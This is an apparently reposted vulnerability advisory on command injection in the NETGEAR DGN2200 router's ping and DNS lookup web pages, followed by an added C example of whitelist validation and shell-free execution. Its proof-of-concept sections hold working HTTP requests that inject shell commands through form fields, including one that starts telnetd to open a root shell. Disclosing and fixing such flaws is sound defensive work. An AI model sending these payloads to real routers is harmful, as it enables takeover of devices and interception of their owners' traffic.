NetGear N300 DGN2200 Multiple Security Vulnerabilities (2)


Description
-----------
The ping function available through the web interface is vulnerable to operating system command injection. An attacker with authenticated web user access can gain OS command execution privileges which can be leveraged to backdoor the router, intercept and modify internet traffic, and access connected devices.


Impact
------
Using this vulnerability, BAE Systems was able to execute arbitrary commands on the underlying Linux operating system as the root user.


Proof of concept
----------------
Example exploitation to obtain a file and directory listing:

    POST /ping.cgi HTTP/1.1
    Host: 192.168.0.1
    Proxy-Connection: keep-alive
    Content-Length: 81
    Cache-Control: max-age=0
    Authorization: Basic YWRtaW46YXBwbGU3ODE=
    Origin:
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Referer:
    Accept-Encoding: gzip,deflate,sdch
    Accept-Language: en-GB,en-US;q=0.8,en;q=0.6
    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

    IPAddr1=a&IPAddr2=b&IPAddr3=c&IPAddr4=d&ping=xxxx&ping_IPAddr=|ls

To get an interactive shell,

1. Send the following POST data:

       IPAddr1=a&IPAddr2=b&IPAddr3=c&IPAddr4=d&ping=xxxx&ping_IPAddr=|/usr/sbin/telnetd -p 90 -l /bin/sh

2. Telnet to port 90


Solution
--------
Validate untrusted user input against a whitelist of acceptable values before it reaches any command line. For example, IPv4 address values may only include the digits '0' through '9' and full stops ('.'); any other character should cause the request to be rejected rather than "cleaned".

3.  Blind Command Execution with DNS Lookup
===========================================

Requires
--------
Authenticated access to the web administration interface.


Description
-----------
The DNS lookup function available through the web interface is vulnerable to operating system command injection. An attacker with authenticated web user access can gain OS command execution privileges which can be leveraged to backdoor the router, intercept and modify internet traffic, and access connected devices.


Impact
------
Using this vulnerability, BAE Systems was able to execute arbitrary commands on the underlying Linux operating system but was unable to see the response.


Proof of concept
----------------
Example exploitation demonstrating the issue through use of the ‘sleep’ command to delay the response from the server:

    POST /dnslookup.cgi HTTP/1.1
    Host: 192.168.0.1
    Proxy-Connection: keep-alive
    Content-Length: 32
    Cache-Control: max-age=0
    Authorization: Basic YWRtaW46YXBwbGU3ODE=
    Origin:
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Referer:
    Accept-Encoding: gzip,deflate,sdch
    Accept-Language: en-GB,en-US;q=0.8,en;q=0.6
    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

    host_name=|sleep 5&lookup=Lookup

To get an interactive shell,

1.  Send the following POST data:

        hostname=|/usr/sbin/telnetd -p 90 -l /bin/sh&lookup=Lookup

2.  Telnet to port 90
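Both findings on this page share one root cause: a form value (the ping target, or the DNS lookup host name) is concatenated into a shell command line, so a leading '|' turns the rest of the value into a second command. The following C example is added here and is not code from the BAE Systems advisory or from NETGEAR's firmware; it shows the whitelist validation the Solution section recommends for the ping target, the equivalent check for a DNS lookup host name, and a way to invoke ping through execvp() so that no shell ever parses the input. The function names, the "-c 4" ping arguments and the sample inputs are assumptions constructed for the example.

```c
/* Added example (not from the advisory or the router firmware):
 * whitelist validation for a ping target and a DNS lookup name, plus a
 * shell-free exec path. Function names and sample values are constructed. */
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <unistd.h>
#include <sys/wait.h>

/* Strict IPv4 check: exactly four decimal octets 0-255 separated by '.'.
 * Only digits and full stops are accepted, so '|', ';', '`', '$' and
 * whitespace can never reach a command line. Returns 1 if valid, else 0. */
int is_valid_ipv4(const char *s)
{
    int octets = 0;
    if (s == NULL || *s == '\0') return 0;
    while (*s) {
        int value = 0, digits = 0;
        while (isdigit((unsigned char)*s)) {
            value = value * 10 + (*s - '0');
            if (value > 255 || ++digits > 3) return 0;  /* octet out of range */
            s++;
        }
        if (digits == 0) return 0;            /* empty octet, e.g. "1..2.3" */
        octets++;
        if (*s == '.') {
            s++;
            if (*s == '\0') return 0;         /* trailing dot */
        } else if (*s != '\0') {
            return 0;                         /* non-whitelisted character */
        }
    }
    return octets == 4;
}

/* Host name check for the DNS lookup form: labels of letters, digits and
 * '-' (not at a label's start or end), each 1-63 chars, total <= 253,
 * no empty labels and no trailing dot. Returns 1 if valid, else 0. */
int is_valid_hostname(const char *s)
{
    size_t len, label = 0;
    if (s == NULL) return 0;
    len = strlen(s);
    if (len == 0 || len > 253) return 0;
    for (size_t i = 0; i < len; i++) {
        char c = s[i];
        if (c == '.') {
            if (label == 0 || s[i - 1] == '-') return 0;  /* empty label or "-." */
            label = 0;
        } else if (isalnum((unsigned char)c) || c == '-') {
            if (label == 0 && c == '-') return 0;        /* label starts with '-' */
            if (++label > 63) return 0;
        } else {
            return 0;   /* anything else, including '|' and spaces */
        }
    }
    return label > 0;
}

/* Run ping with the validated target as a single argv element. execvp()
 * hands argv straight to the kernel, so there is no shell to interpret
 * metacharacters even if the validator were ever loosened. Returns the
 * child's exit status, or -1 if the input is rejected or exec fails.
 * The ping path and "-c 4" are assumptions for this example. */
int run_ping_safely(const char *target)
{
    if (!is_valid_ipv4(target)) return -1;   /* reject, never "sanitise" */
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *const argv[] = { "ping", "-c", "4", (char *)target, NULL };
        execvp("/bin/ping", argv);
        _exit(127);                          /* only reached if exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed inputs: a benign address, then values shaped like the
     * advisory's payloads, which the validators must reject. */
    const char *ips[] = { "192.168.0.1", "1.2.3.4|ls", "256.1.1.1" };
    const char *hosts[] = { "example.com", "|sleep 5", "-bad.example" };
    for (int i = 0; i < 3; i++)
        printf("ipv4 %-14s -> %s\n", ips[i], is_valid_ipv4(ips[i]) ? "accept" : "reject");
    for (int i = 0; i < 3; i++)
        printf("host %-14s -> %s\n", hosts[i], is_valid_hostname(hosts[i]) ? "accept" : "reject");
    return 0;
}
```

The design point is that rejection happens before any process is spawned, and that the accepted value is passed as one argv element rather than spliced into a string handed to system() or popen(); either measure alone closes the injection shown above, and together they leave no shell in the path for a future change to reintroduce it.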

Content copyright notice: unless otherwise stated, all articles are original to this site.

When reprinting, credit the source: http://www.heiqu.com/66210a44fb37e8f0727b488fcf93708a.html